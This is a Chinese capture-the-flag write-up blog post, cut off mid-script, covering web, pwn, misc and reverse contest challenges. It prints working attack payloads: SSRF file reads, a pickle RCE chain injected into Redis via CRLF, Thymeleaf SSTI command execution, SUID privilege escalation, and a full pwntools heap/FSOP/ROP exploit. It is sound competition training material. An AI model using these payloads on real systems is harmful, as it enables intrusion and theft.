Logo
Overview

2026软件安全赛初赛东北赛区题解

March 15, 2026

两个人ak了。

不过…我讨厌国内安全比赛。

web

auth

注册一个用户之后修改头像,avatar_url 支持 file:// 协议,可以任意文件读取,但是没权限读取 /flag,结果经过 base64 后放在头像框内

先读 /app/app.py

avatar_url=file:///app/app.py

发现存在 redis,尝试读 redis 持久化文件 dump.rdb

avatar_url=file:///var/lib/redis/dump.rdb

拿到 Flask secret_key

伪造 admin 的 session cookie 登录

/admin/online-users 会遍历 online_user:* 并反序列化。

虽然用了 RestrictedUnpickler,但放行了 builtins.getattr,而 OnlineUser 在白名单内

可构造 pickle 链:

TEXT
getattr(getattr(getattr(getattr(OnlineUser, "__init__"),"__globals__")"get")("os"),"system")(cmd)

由于目标是:online_user:<user>

需要把该键覆盖成恶意 pickle

利用点仍是 avatar_url:将请求打到 127.0.0.1:6379,通过 CRLF + RESP 进行协议注入,发送:

TEXT
AUTH redispass123
SET online_user:<user> <pickle_payload>
EXPIRE online_user:<user> 3600

通过读取 file:///proc/1/task/1/children,拿到子进程 PID:11 14 20

逐个读 file:///proc/<pid>/cmdline

在 pid=11 看到可疑启动命令:

TEXT
python3 /opt/mcp_service/mcp_server_secure_e938a2d234b7968a885bbbbb63cde7b9.py

直接读这个脚本文件,发现里面存在:

TEXT
SimpleXMLRPCServer(("0.0.0.0", 54321), ...)

暴露方法 execute_command,同时硬编码 token 为 mcp_secure_token_b2rglxd

在容器内执行 xmlrpc.client.ServerProxy("http://127.0.0.1:54321/") 可以调用

所以反序列化命令可以直接写成:

PYTHON
python3 -c "import xmlrpc.client;print(xmlrpc.client.ServerProxy('http://127.0.0.1:54321/').execute_command('mcp_secure_token_b2rglxd','cat /flag'))" >/tmp/mcp_out.txt

最后用任读从 /tmp/mcp_out.txt 中拿到flag

thymeleaf

  1. PRNG 状态泄露

用户注册时会从后端返回一个 PRNG 取值,可以从中获得其内部状态,然后反推回 admin 账号的密码

TEXT
 MASK = (1 << 48) - 1
 LOW47 = (1 << 47) - 1
 
 def prev_candidates(cur):
     base = ((cur & LOW47) << 1) & MASK
     return [base, base | 1]
2. Thymeleaf SSTI

控制器中存在

TEXT
 return "admin :: " + section;

当 Thymeleaf 看到 :: 时,会把它当作 fragment expression 去解析,故此处存在 SSTI 漏洞

在高版本 Thymeleaf 里,直接写 ${...} 通常会被拦,但通过预处理和字面量拼接可以绕过:

TEXT
__|$${...}|__::.x

在通过 SSTI 进行 RCE 的过程中,由于不同 JDK 版本的 Runtime.exec 的多个重载顺序可能不同,需要爆破之后找出可用的重载下标

TEXT
 rt = "''.getClass().forName('java.lang.Runtime').getMethods.?[name=='getRuntime'][0].invoke(null)"
 expr = f"{rt}.getClass.getMethods.?[name=='exec'][{idx}].invoke({rt},'/usr/bin/id')"

RCE 之后进去的用户是 ctf,需要 root 用户才能读取 /flag

3. 7z提权

find suid:

TEXT
 find / -perm -4000 -type f

发现最主要的 7z,最后使用 /usr/bin/7z a -ttar -an -so /flag 直接获得 flag 内容

pwn

MailSystem

  1. 注册13个用户可以把admin指针给覆盖掉从而可以登录
  2. 下界没有考虑导致可以从mail_user_to_user leak到libc,从而覆盖stdout。
  3. 然后栈迁移 -> rop。
PYTHON
from pwn import *
import os, shutil, tempfile
import socket


context.arch = 'amd64'
context.os = 'linux'
context.log_level = 'info'


EXE = './pwn'
LIBC = './libc.so.6'
LD = './ld-linux-x86-64.so.2'


elf = context.binary = ELF(EXE, checksec=False)
libc = ELF(LIBC, checksec=False)


stdout_offset = -7


host = '192.0.100.2'
port = 9999
socks5 = '3.dart.ccsssc.com:26177'
socks_user = '3hm3n1br'
socks_pass = 'tbkzq6tp'




def _normalize_socks5(value: str) -> str:
    if not value:
        return ''
    value = str(value).strip()
    if value.lower() in {'0', 'false', 'off', 'no', 'none'}:
        return ''
    return value




def _normalize_opt(value: str) -> str:
    if value is None:
        return ''
    value = str(value).strip()
    if value.lower() in {'0', 'false', 'off', 'no', 'none'}:
        return ''
    return value




def _enable_socks5(proxy_spec: str, username: str = '', password: str = ''):
    proxy_spec = _normalize_socks5(proxy_spec)
    if not proxy_spec:
        return


    host, sep, port = proxy_spec.rpartition(':')
    if not sep or not host or not port.isdigit():
        raise ValueError(f'Invalid SOCKS5 proxy: {proxy_spec!r}, expected host:port')


    import socks


    username = _normalize_opt(username)
    password = _normalize_opt(password)
    socks.set_default_proxy(
        socks.SOCKS5,
        host,
        int(port),
        username=username or None,
        password=password or None,
    )
    socket.socket = socks.socksocket
    auth_state = 'enabled' if username or password else 'disabled'
    info(f'Using SOCKS5 proxy: {host}:{port} (auth={auth_state})')




def _prepare_loader(path: str) -> str:
    if os.access(path, os.X_OK):
        return path
    dst = os.path.join(tempfile.gettempdir(), 'ld.mail_system')
    if not os.path.exists(dst):
        shutil.copy2(path, dst)
        os.chmod(dst, 0o755)
    return dst




def start():
    if args.REMOTE:
        _enable_socks5(socks5, socks_user, socks_pass)
        io = remote(host, port)
    else:
        ld = _prepare_loader(LD)
        io = process([ld, '--library-path', '.', EXE], stdin=PIPE, stdout=PIPE)
    io.recvuntil(b'Your choice: ')
    return io




def register(io, name: bytes, password: bytes):
    io.sendline(b'2')
    io.recvuntil(b'Input your name: ')
    io.sendline(name)
    io.recvuntil(b'Input your password: ')
    io.sendline(password)
    return io.recvuntil(b'Your choice: ')




def login_user(io, name: bytes, password: bytes):
    io.sendline(b'1')
    io.recvuntil(b'Input your name: ')
    io.sendline(name)
    io.recvuntil(b'Input your password: ')
    io.sendline(password)
    return io.recvuntil(b'Your choice: ')




def login_admin(io):
    io.sendline(b'1')
    io.recvuntil(b'Input your name: ')
    io.send(b'\x00\n')
    io.recvuntil(b'Input your password: ')
    io.send(b'\x00\n')
    return io.recvuntil(b'Your choice: ')




def write_mail(io, data: bytes):
    assert 1 <= len(data) <= 0x100
    io.sendline(b'1')
    io.recvuntil(b'How many bytes do you want to write? (1-256): ')
    io.sendline(str(len(data)).encode())
    io.recvuntil(b'bytes):\n')
    io.send(data)
    return io.recvuntil(b'Your choice: ')




def send_mail(io, dst: int, overwrite: bool = True):
    io.sendline(b'3')
    io.recvuntil(b'Who do you want to send the mail to? (input user ID 1-12)\n')
    io.sendline(str(dst).encode())
    out = io.recvuntil([b'Overwrite? (y/n): ', b'Your choice: '])
    if out.endswith(b'Overwrite? (y/n): '):
        io.sendline(b'y' if overwrite else b'n')
        out += io.recvuntil(b'Your choice: ')
    return out




def logout_user(io):
    io.sendline(b'4')
    return io.recvuntil(b'Your choice: ')




def admin_logout(io):
    io.sendline(b'5')
    return io.recvuntil(b'Your choice: ')




def admin_forward(io, src: int, dst: int, which: int, overwrite: bool = True, final_mode: str = 'prompt'):
    io.sendline(b'4')
    io.recvuntil(b'Enter source user ID (whose mail to forward): (1-12) ')
    io.sendline(str(src).encode())
    io.recvuntil(b'Enter destination user ID (1-12): ')
    io.sendline(str(dst).encode())


    out = io.recvuntil([b'Overwrite? (y/n): ', b'Which mail would you like to forward?\n', b'Your choice: '])
    if out.endswith(b'Overwrite? (y/n): '):
        io.sendline(b'y' if overwrite else b'n')
        out += io.recvuntil([b'Which mail would you like to forward?\n', b'Your choice: '])


    if b'Which mail would you like to forward?' not in out:
        return out


    io.recvuntil(b'Your choice: ')
    io.sendline(str(which).encode())


    if final_mode == 'prompt':
        out += io.recvuntil(b'Your choice: ')
    else:
        out += io.recvrepeat(0.5)
    return out




def ban_user(io, name: bytes, password: bytes, victim_id: int = 8):
    out = login_user(io, name, password)
    if b'Welcome back' not in out:
        raise RuntimeError(f'login failed for {name!r}: {out!r}')


    # 1. Write mail
    # 1 byte
    # content = 'A'
    # 3. Send mail
    # victim_id
    # overwrite = y
    one = b'1\n1\nA3\n' + str(victim_id).encode() + b'\ny\n'


    total = 0
    while True:
        io.send(one * 6)
        total += 6


        out = io.recvuntil(b'Your choice: ', timeout=5)
        out += io.recvrepeat(0.2)


        if b'Account has been banned!' in out:
            success(f'{name!r} banned after {total} sends')
            return out


        if b'Welcome back' in out and b'1. Write mail' not in out:
            raise RuntimeError(f'{name!r} state changed unexpectedly: {out!r}')


        info(f'{name!r} not banned yet, sent={total}')


def takeover_admin(io):
    for i in range(1, 9):
        register(io, f'u{i}'.encode(), f'p{i}'.encode())
    for i in range(1, 6):
        ban_user(io, f'u{i}'.encode(), f'p{i}'.encode())
    for i in range(9, 13):
        register(io, f'u{i}'.encode(), f'p{i}'.encode())
    register(io, b'u13', b'p13')
    out = login_admin(io)
    assert b'Welcome admin!' in out




def leak_libc(io, src_uid: int = 8):
    payload = flat(0xfbad1800, 0, 0, 0) + p16(0xb780)


    admin_logout(io)
    login_user(io, f'u{src_uid}'.encode(), f'p{src_uid}'.encode())
    write_mail(io, payload)
    logout_user(io)
    login_admin(io)


    data = admin_forward(io, src_uid, stdout_offset, 1, final_mode='repeat')
    marker = b'Which mail would you like to forward?\n'
    leak = data.split(marker, 1)[1].split(b'Mail forwarded', 1)[0]


    stdout = u64(leak[0x20:0x28])
    libc_base = stdout - libc.sym['_IO_2_1_stdout_']


    success(f'libc_base = {hex(libc_base)}')
    success(f'stdout    = {hex(stdout)}')
    return libc_base, stdout




def build_stdout_payload(libc_base: int, stdout: int):
    stderr = libc_base + libc.sym['_IO_2_1_stderr_']
    stdin = libc_base + libc.sym['_IO_2_1_stdin_']


    stage2_addr = libc_base + 0x21d000
    wide_data = stdout - 0x50


    setcontext_3d = libc_base + libc.sym['setcontext'] + 0x3d
    read_addr = libc_base + libc.sym['read']
    file_jumps = libc_base + 0x217600
    wfile_jumps = libc_base + 0x2170c0
    lock_ptr = libc_base + 0x21ca70


    d = bytearray(0x100)


    def wq(off: int, val: int):
        d[off:off + 8] = p64(val)


    def wd(off: int, val: int):
        d[off:off + 4] = p32(val & 0xffffffff)


    # known-good stdout template for this libc
    wq(0x00, 0xfbad2887)
    for off in [0x08, 0x10, 0x18, 0x20, 0x28, 0x30, 0x38]:
        wq(off, stdout + 0x83)
    wq(0x40, stdout + 0x84)
    wq(0x48, 0)
    wq(0x50, 0)
    wq(0x58, 0)
    wq(0x60, 0)
    wq(0x68, stdin)
    wq(0x70, 1)
    wq(0x78, 0xffffffffffffffff)
    wq(0x80, 0x0a000000)
    wq(0x88, lock_ptr)
    wq(0x90, 0xffffffffffffffff)
    wq(0x98, 0)
    wq(0xa0, libc_base + 0x21a9a0)
    wq(0xa8, 0)
    wq(0xb0, 0)
    wq(0xb8, 0)
    wd(0xc0, 0xffffffff)
    wq(0xc8, 0)
    wq(0xd0, 0)
    wq(0xd8, file_jumps)
    wq(0xe0, stderr)
    wq(0xe8, stdout)
    wq(0xf0, stdin)
    wq(0xf8, 0)


    # exploit patch:
    #   _IO_wfile_overflow -> _IO_wdoallocbuf -> call [wide_vtable+0x68]
    # with wide_data = stdout-0x50 and wide_vtable = stdout.
    wq(0x00, 0xfbad2085)      # clear _IO_NO_WRITES and clear the 0x800 bit
    wq(0x18, 0)               # wide+0x68 -> rdi = 0
    wq(0x20, stage2_addr)     # wide+0x70 -> rsi = stage2 buffer
    wq(0x38, 0x400)           # wide+0x88 -> rdx = count
    wq(0x48, 0)               # wide+0x98 -> rcx
    wq(0x50, stage2_addr)     # wide+0xa0 -> rsp = stage2 buffer
    wq(0x58, read_addr)       # wide+0xa8 -> return to read
    wq(0x68, setcontext_3d)   # stdout[0x68] == fake_wide_vtable[0x68]
    wq(0x90, stdout)          # wide+0xe0 -> fake wide_vtable = stdout
    wq(0xa0, wide_data)       # _wide_data = stdout-0x50
    wd(0xc0, 1)               # _mode > 0
    wq(0xd8, wfile_jumps)     # use _IO_wfile_jumps


    return bytes(d), stage2_addr




io = start()
takeover_admin(io)
success("stage1 done: fake admin acquired")


libc_base, stdout = leak_libc(io)
stdout_payload, stage2_addr = build_stdout_payload(libc_base, stdout)


rop = ROP(libc)


pop_rdi = rop.find_gadget(["pop rdi", "ret"]).address + libc_base
pop_rsi = rop.find_gadget(["pop rsi", "ret"]).address + libc_base
pop_rdx_r12 = (
    next(
        addr
        for addr, g in rop.gadgets.items()
        if g.insns == ["pop rdx", "pop r12", "ret"]
    )
    + libc_base
)


open_addr = libc_base + libc.sym["open"]
read_addr = libc_base + libc.sym["read"]
write_addr = libc_base + libc.sym["write"]


flag_addr = stage2_addr + 0x180
buf_addr = stage2_addr + 0x200


stage2 = flat(
    pop_rdi,
    flag_addr,
    pop_rsi,
    0,
    pop_rdx_r12,
    0,
    0,
    open_addr,
    pop_rdi,
    3,
    pop_rsi,
    buf_addr,
    pop_rdx_r12,
    0x100,
    0,
    read_addr,
    pop_rdi,
    1,
    pop_rsi,
    buf_addr,
    pop_rdx_r12,
    0x100,
    0,
    write_addr,
)


stage2 = stage2.ljust(0x180, b"\x00") + b"/flag\x00"
stage2 = stage2.ljust(0x400, b"\x00")


admin_logout(io)
login_user(io, b"u10", b"p10")
write_mail(io, stdout_payload)
logout_user(io)
login_admin(io)


admin_forward(io, 10, stdout_offset, 1, final_mode="repeat")


io.send(b"5\n")
sleep(0.1)
io.send(stage2)


data = io.recvrepeat(2.0)
print(data)
io.interactive()

misc

steg

xxd看一眼

直接删掉前面的东西,libmagic能正常识别了。

但是打不开,图片IDAT CRC爆炸了。把idat拼起来之后错位。

写一个策略尽可能多恢复点东西:

PYTHON
import zlib
from pathlib import Path
from typing import Iterable


from PIL import Image


PNG_SIG = b'\x89PNG\r\n\x1a\n'




def iter_png_chunks(png: bytes):
    if not png.startswith(PNG_SIG):
        raise ValueError('Not a PNG stream')
    off = len(PNG_SIG)
    while off + 12 <= len(png):
        length = int.from_bytes(png[off:off + 4], 'big')
        ctype = png[off + 4:off + 8]
        data_start = off + 8
        data_end = data_start + length
        crc_end = data_end + 4
        if crc_end > len(png):
            break
        yield ctype, png[data_start:data_end], off, crc_end
        off = crc_end
        if ctype == b'IEND':
            break




def get_png_info(png: bytes):
    for ctype, data, _start, _end in iter_png_chunks(png):
        if ctype == b'IHDR':
            if len(data) != 13:
                raise ValueError('Bad IHDR length')
            width = int.from_bytes(data[0:4], 'big')
            height = int.from_bytes(data[4:8], 'big')
            bit_depth = data[8]
            color_type = data[9]
            compression = data[10]
            filter_method = data[11]
            interlace = data[12]


            return {
                'width': width,
                'height': height,
                'bit_depth': bit_depth,
                'color_type': color_type,
                'compression': compression,
                'filter_method': filter_method,
                'interlace': interlace,
                'channels': {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}.get(color_type, 0)
            }
    raise ValueError('IHDR not found')




def paeth_predictor(a: int, b: int, c: int):
    p = a + b - c
    pa = abs(p - a)
    pb = abs(p - b)
    pc = abs(p - c)
    if pa <= pb and pa <= pc:
        return a
    if pb <= pc:
        return b
    return c




def reconstruct_scanline(filter_type: int, filtered: bytes, prior: bytes, channels: int = 3):
    stride = len(filtered)
    recon = bytearray(stride)


    if filter_type == 0:  # None
        recon[:] = filtered


    elif filter_type == 1:  # Sub
        for x in range(stride):
            a = recon[x - channels] if x >= channels else 0
            recon[x] = (filtered[x] + a) & 0xff


    elif filter_type == 2:  # Up
        for x in range(stride):
            recon[x] = (filtered[x] + prior[x]) & 0xff


    elif filter_type == 3:  # Average
        for x in range(stride):
            a = recon[x - channels] if x >= channels else 0
            b = prior[x]
            recon[x] = (filtered[x] + ((a + b) // 2)) & 0xff


    elif filter_type == 4:  # Paeth
        for x in range(stride):
            a = recon[x - channels] if x >= channels else 0
            b = prior[x]
            c = prior[x - channels] if x >= channels else 0
            recon[x] = (filtered[x] + paeth_predictor(a, b, c)) & 0xff


    else:
        raise ValueError(f'Invalid filter type: {filter_type}')


    return bytes(recon)




# Main program
input_file = Path('carved.png')
output_file = Path('carved_repaired.png')


# Read PNG
png_data = input_file.read_bytes()


# Parse PNG info
info = get_png_info(png_data)
width = info['width']
height = info['height']
num_channels = info['channels']


# Extract and concatenate all IDAT chunks
idat_data = bytearray()
idx = 0
while True:
    i = png_data.find(b'IDAT', idx)
    if i < 0:
        break
    if i >= 4:
        length = int.from_bytes(png_data[i - 4:i], 'big')
        data_start = i + 4
        data_end = data_start + length
        if data_end <= len(png_data):
            idat_data.extend(png_data[data_start:data_end])
    idx = i + 1


idat_data = bytes(idat_data)


raw = zlib.decompressobj().decompress(idat_data)
row_len = 1 + num_channels * width
expected = row_len * height
max_delta = len(raw) - expected


# dp
neg = -10 ** 9
prev = [neg] * (max_delta + 1)
prev[0] = 1 if raw[0] <= 4 else 0
parents = []


for r in range(1, height):
    cur = [neg] * (max_delta + 1)
    par = [-1] * (max_delta + 1)


    for d in range(max_delta + 1):
        best = neg
        best_pd = -1
        lo = max(0, d - 12)
        for pd in range(lo, d + 1):
            if prev[pd] > best:
                best = prev[pd]
                best_pd = pd


        if best_pd >= 0:
            idx_offset = d + r * row_len
            if idx_offset < len(raw):
                cur[d] = best + (1 if raw[idx_offset] <= 4 else 0)
                par[d] = best_pd


    parents.append(par)
    prev = cur


def endpoint_score(d):
    base_score = prev[d]
    penalty = abs(d - max_delta) * 0.2
    return base_score - penalty


end_delta = max(range(max_delta + 1), key=endpoint_score)


path = [end_delta]
for r in range(height - 1, 0, -1):
    end_delta = parents[r - 1][end_delta]
    path.append(end_delta)
path.reverse()
stride = num_channels * width


rows = []
prior = bytearray(stride)


for r, d in enumerate(path):
    start = d + r * row_len
    filter_type = raw[start]
    filtered = raw[start + 1:start + 1 + stride]


    try:
        recon = reconstruct_scanline(filter_type, filtered, prior, num_channels)
        rows.append(recon)
        prior = recon
    except ValueError:
        recon = bytes(stride)
        rows.append(recon)
        prior = bytearray(stride)


img_data = b''.join(rows)
img = Image.frombytes('RGB', (width, height), img_data)


img.save(output_file)

拿出来是这样一张。

低位lsb,RGB拼接。能看到zip包。

这里小文件可以用crc32爆破了。

于是恢复出来

TEXT
pass
 is
c1!x
xtLf
%fXY
PkaA

解压flag.txt,0宽字符。。。。01编码,复原。

PYTHON
    zw = ''.join(ch for ch in text if ch in '\u200b\u200c')
    if not zw:
        raise ValueError('no zero-width data found')
    bits = ''.join('0' if ch == '\u200b' else '1' for ch in zw)
    usable = len(bits) // 8 * 8
    raw = bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))
    try:
        return raw.decode('utf-8')
    except UnicodeDecodeError:
        return raw.decode('latin1')

reverse

re1

这里拼了个pyc,拿下来pylingual还原。

PYTHON
# Decompiled with PyLingual (https://pylingual.io)
# Internal filename: 'Payload_To_PixelCode_video.py'
# Bytecode version: 3.7.0 (3394)
# Source timestamp: 2026-01-04 04:02:18 UTC (1767499338)


from PIL import Image
import math
import os
import sys
import numpy as np
import imageio
from tqdm import tqdm
def file_to_video(input_file, width=640, height=480, pixel_size=8, fps=10, output_file='video.mp4'):
    if not os.path.isfile(input_file):
        return None
    file_size = os.path.getsize(input_file)
    binary_string = ''
    with open(input_file, 'rb') as f:
        for chunk in tqdm(iterable=iter(lambda: f.read(1024), b''), total=math.ceil(file_size / 1024), unit='KB', desc='读取文件'):
            binary_string += ''.join((f'{byte:08b}' for byte in chunk))
    xor_key = '10101010'
    xor_binary_string = ''
    for i in range(0, len(binary_string), 8):
        chunk = binary_string[i:i + 8]
        if len(chunk) == 8:
            chunk_int = int(chunk, 2)
            key_int = int(xor_key, 2)
            xor_result = chunk_int ^ key_int
            xor_binary_string += f'{xor_result:08b}'
        else:
            xor_binary_string += chunk
    binary_string = xor_binary_string
    pixels_per_image = width // pixel_size * (height // pixel_size)
    num_images = math.ceil(len(binary_string) / pixels_per_image)
    frames = []
    for i in tqdm(range(num_images), desc='生成视频帧'):
        start = i * pixels_per_image
        bits = binary_string[start:start + pixels_per_image]
        if len(bits) < pixels_per_image:
            bits = bits + '0' * (pixels_per_image - len(bits))
        img = Image.new('RGB', (width, height), color='white')
        for r in range(height // pixel_size):
            row_start = r * (width // pixel_size)
            row_end = (r + 1) * (width // pixel_size)
            row = bits[row_start:row_end]
            for c, bit in enumerate(row):
                color = (0, 0, 0) if bit == '1' else (255, 255, 255)
                x1, y1 = (c * pixel_size, r * pixel_size)
                img.paste(color, (x1, y1, x1 + pixel_size, y1 + pixel_size))
        frames.append(np.array(img))
    with imageio.get_writer(output_file, fps=fps, codec='libx264') as writer:
        for frame in tqdm(frames, desc='写入视频帧'):
            writer.append_data(frame)
if __name__ == '__main__':
    input_path = 'payload'
    if os.path.exists(input_path):
        file_to_video(input_path)
    else:
        sys.exit(1)

简单还原下。

PYTHON
from PIL import Image
import cv2
import math
import numpy as np
from tqdm import tqdm




cap = cv2.VideoCapture("video.mp4")


bits = ""


width=640
height=480
pixel_size=8
fps=10


total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
for _ in tqdm(range(total_frames)):
    ret, frame = cap.read()
    if not ret:
        break
    frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
    for r in range(height // pixel_size):
        for c in range(width // pixel_size):
            x = c * pixel_size
            y = r * pixel_size
            pixel = frame[y + pixel_size // 2, x + pixel_size // 2]
            if np.mean(pixel) < 128:
                bits += "1"
            else:
                bits += "0"
cap.release()


xor_key = "10101010"
recovered_bits = ""


for i in range(0, len(bits), 8):
    chunk = bits[i : i + 8]
    if len(chunk) == 8:
        val = int(chunk, 2) ^ int(xor_key, 2)
        recovered_bits += f"{val:08b}"


data = bytearray()
for i in range(0, len(recovered_bits), 8):
    byte = recovered_bits[i : i + 8]
    if len(byte) == 8:
        data.append(int(byte, 2))


open("1", "wb").write(data)
PYTHON
import hashlib


strs = """8277e0910d750195b448797616e091ad
0cc175b9c0f1b6a831c399e269772661
4b43b0aee35624cd95b910189b3dc231
e358efa489f58062f10dd7316b65649e
f95b70fdc3088560732a5ac135644506
c81e728d9d4c2f636f067f89cc14862c
92eb5ffee6ae2fec3ad71c777531578f
c4ca4238a0b923820dcc509a6f75849b
8fa14cdd754f91cc6554c9e71929cce7
c9f0f895fb98ab9159f51fd0297e236d
336d5ebc5436534e61d16e63ddfca327
eccbc87e4b5ce2fe28308fd9f2a7baf3
cfcd208495d565ef66e7dff9f98764da
a87ff679a2f3e71d9181a67b7542122c
e4da3b7fbbce2345d7772b0674a318d5
e1671797c52e15f763380b45e841ec32
8f14e45fceea167a5a36dedd4bea2543
1679091c5a880faf6fb5e6087eb1b2dc
4a8a08f09d37b73795649038408b5f33
cbb184dd8e05c9709e5dcaedaa0495cf""".splitlines()


maps = {}
for i in range(0,255):
    r = hashlib.md5(chr(i).encode()).hexdigest()
    maps[r] = chr(i)


for s in strs:
    print(maps[s], end="")

re2

类似upx的壳。解压完了走这个地方0x4014E0跳出。

没带windows只能unicorn跑了。需要模拟几个系统函数。

PYTHON
api_stubs = {
    "LoadLibraryA": api_base + 0x100,
    "ExitProcess": api_base + 0x200,
    "GetProcAddress": api_base + 0x300,
    "VirtualProtect": api_base + 0x400,
    "exit": api_base + 0x500,
}

能取出来一个base64。解码是下一个stage。

PYTHON
import base64
import struct
import os
import pefile
from unicorn import Uc
from unicorn.x86_const import *
from unicorn.unicorn_const import *


os.makedirs("out", exist_ok=True)


packed_pe = pefile.PE("challenge.exe")
packed_image = open("challenge.exe", "rb").read()
packed_base = packed_pe.OPTIONAL_HEADER.ImageBase
packed_size = (packed_pe.OPTIONAL_HEADER.SizeOfImage + 0xFFF) & ~0xFFF


mu = Uc(UC_ARCH_X86, UC_MODE_64)
mu.mem_map(packed_base, packed_size)
mu.mem_write(packed_base, packed_image[: packed_pe.OPTIONAL_HEADER.SizeOfHeaders])
for packed_section in packed_pe.sections:
    packed_raw = packed_image[
        packed_section.PointerToRawData : packed_section.PointerToRawData + packed_section.SizeOfRawData
    ]
    if packed_raw:
        mu.mem_write(packed_base + packed_section.VirtualAddress, packed_raw)


stack_base = 0x01000000
stack_size = 0x00200000
mu.mem_map(stack_base, stack_size)
mu.reg_write(UC_X86_REG_RSP, stack_base + stack_size - 0x10000)


api_base = 0x03000000
mu.mem_map(api_base, 0x00020000)
api_stubs = {
    "LoadLibraryA": api_base + 0x100,
    "ExitProcess": api_base + 0x200,
    "GetProcAddress": api_base + 0x300,
    "VirtualProtect": api_base + 0x400,
    "exit": api_base + 0x500,
}
for api_stub in api_stubs.values():
    mu.mem_write(api_stub, b"\xC3")


for import_entry in packed_pe.DIRECTORY_ENTRY_IMPORT:
    for import_symbol in import_entry.imports:
        if not import_symbol.name:
            continue
        import_name = import_symbol.name.decode()
        if import_name in api_stubs:
            mu.mem_write(import_symbol.address, struct.pack("<Q", api_stubs[import_name]))


state = {"stop": False, "next_fake": api_base + 0x1000}
dll_handles: dict[str, int] = {}
symbol_addrs: dict[tuple[int, str], int] = {}
addr_to_name: dict[int, str] = {}




def on_code(mu: Uc, address: int, _size: int, user_data: dict) -> None:
    if address == 0x4014E0:
        print("reached 0x4014E0", stop)
        user_data["stop"] = True
        mu.emu_stop()
        return


    if address == api_stubs["LoadLibraryA"]:
        print(f"called LoadLibraryA")
        rcx = mu.reg_read(UC_X86_REG_RCX)
        dll_name_bytes = bytearray()
        while True:
            current = mu.mem_read(rcx, 1)[0]
            if current == 0:
                break
            dll_name_bytes.append(current)
            rcx += 1
        dll_name = dll_name_bytes.decode("latin1")
        handle = dll_handles.setdefault(dll_name, api_base + 0x8000 + len(dll_handles) * 0x100)
        rsp = mu.reg_read(UC_X86_REG_RSP)
        ret_addr = struct.unpack("<Q", mu.mem_read(rsp, 8))[0]
        mu.reg_write(UC_X86_REG_RSP, rsp + 8)
        mu.reg_write(UC_X86_REG_RAX, handle)
        mu.reg_write(UC_X86_REG_RIP, ret_addr)
        return


    if address == api_stubs["GetProcAddress"]:
        print(f"called GetProcAddress")
        handle = mu.reg_read(UC_X86_REG_RCX)
        rdx = mu.reg_read(UC_X86_REG_RDX)
        symbol_name_bytes = bytearray()
        while True:
            current = mu.mem_read(rdx, 1)[0]
            if current == 0:
                break
            symbol_name_bytes.append(current)
            rdx += 1
        symbol_name = symbol_name_bytes.decode("latin1")
        symbol_key = (handle, symbol_name)
        if symbol_key not in symbol_addrs:
            fake_addr = user_data["next_fake"]
            user_data["next_fake"] += 0x10
            symbol_addrs[symbol_key] = fake_addr
            addr_to_name[fake_addr] = symbol_name
            mu.mem_write(fake_addr, b"\xC3" * 8)
        rsp = mu.reg_read(UC_X86_REG_RSP)
        ret_addr = struct.unpack("<Q", mu.mem_read(rsp, 8))[0]
        mu.reg_write(UC_X86_REG_RSP, rsp + 8)
        mu.reg_write(UC_X86_REG_RAX, symbol_addrs[symbol_key])
        mu.reg_write(UC_X86_REG_RIP, ret_addr)
        return


    if address == api_stubs["VirtualProtect"]:
        print(f"called VirtualProtect")
        old_protect_ptr = mu.reg_read(UC_X86_REG_R9)
        if old_protect_ptr:
            mu.mem_write(old_protect_ptr, struct.pack("<I", 0x20))
        rsp = mu.reg_read(UC_X86_REG_RSP)
        ret_addr = struct.unpack("<Q", mu.mem_read(rsp, 8))[0]
        mu.reg_write(UC_X86_REG_RSP, rsp + 8)
        mu.reg_write(UC_X86_REG_RAX, 1)
        mu.reg_write(UC_X86_REG_RIP, ret_addr)
        return


    if address in (api_stubs["ExitProcess"], api_stubs["exit"]):
        print(f"called ExitProcess")
        user_data["stop"] = True
        mu.emu_stop()
        return


    if address not in addr_to_name:
        return


    fake_name = addr_to_name[address]
    fake_result = 0
    if fake_name == "GetCurrentProcess":
        fake_result = 114514
    elif fake_name in {"GetCurrentProcessId", "GetCurrentThreadId", "GetTickCount"}:
        fake_result = 1
    elif fake_name == "QueryPerformanceCounter":
        out_ptr = mu.reg_read(UC_X86_REG_RCX)
        mu.mem_write(out_ptr, struct.pack("<Q", 1))
        fake_result = 1
    elif fake_name == "GetSystemTimeAsFileTime":
        out_ptr = mu.reg_read(UC_X86_REG_RCX)
        mu.mem_write(out_ptr, struct.pack("<Q", 0))
    elif fake_name == "GetStartupInfoA":
        out_ptr = mu.reg_read(UC_X86_REG_RCX)
        mu.mem_write(out_ptr, b"\x00" * 0x68)
    elif fake_name == "GetModuleHandleA":
        fake_result = packed_base
    elif fake_name in {
        "VirtualQuery",
        "RtlAddFunctionTable",
        "InitializeCriticalSection",
        "DeleteCriticalSection",
        "EnterCriticalSection",
        "LeaveCriticalSection",
        "SetUnhandledExceptionFilter",
    }:
        fake_result = 1


    rsp = mu.reg_read(UC_X86_REG_RSP)
    ret_addr = struct.unpack("<Q", mu.mem_read(rsp, 8))[0]
    mu.reg_write(UC_X86_REG_RSP, rsp + 8)
    mu.reg_write(UC_X86_REG_RAX, fake_result)
    mu.reg_write(UC_X86_REG_RIP, ret_addr)




mu.hook_add(UC_HOOK_CODE, on_code, state)
mu.emu_start(packed_base + packed_pe.OPTIONAL_HEADER.AddressOfEntryPoint, 0)


loader_dump = bytes(mu.mem_read(packed_base, 0x15000))


blob_start = loader_dump.find(b"TVqQAAMAAAAEAAAA//8A")
print(blob_start)


blob_end = blob_start
while blob_end < len(loader_dump) and loader_dump[blob_end] in "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=":
    blob_end += 1


stage2_enc = base64.b64decode(loader_dump[blob_start:blob_end])
open("out/stage2.exe", "wb").write(stage2_enc)

这里做了一次解密。

进去扫一眼大概就知道rc4了。

rc4 key在0x4070C0。可以直接跑,跑完就有.rdata和.hello里的内容。

PYTHON
import pefile


stage2_enc = open("out/stage2.exe", "rb").read()
stage2_pe = pefile.PE(data=stage2_enc)
stage2_dec = bytearray(stage2_enc)


rc4_key_offset = stage2_pe.get_offset_from_rva(0x70C0)
rc4_key = bytes(stage2_dec[rc4_key_offset : rc4_key_offset + 0x20])


for target_name in (b".hello", b".mydata"):
    target_section = next(section for section in stage2_pe.sections if section.Name.rstrip(b"\0") == target_name)
    target_start = target_section.PointerToRawData
    target_end = target_start + target_section.SizeOfRawData


    s = list(range(256))
    j = 0
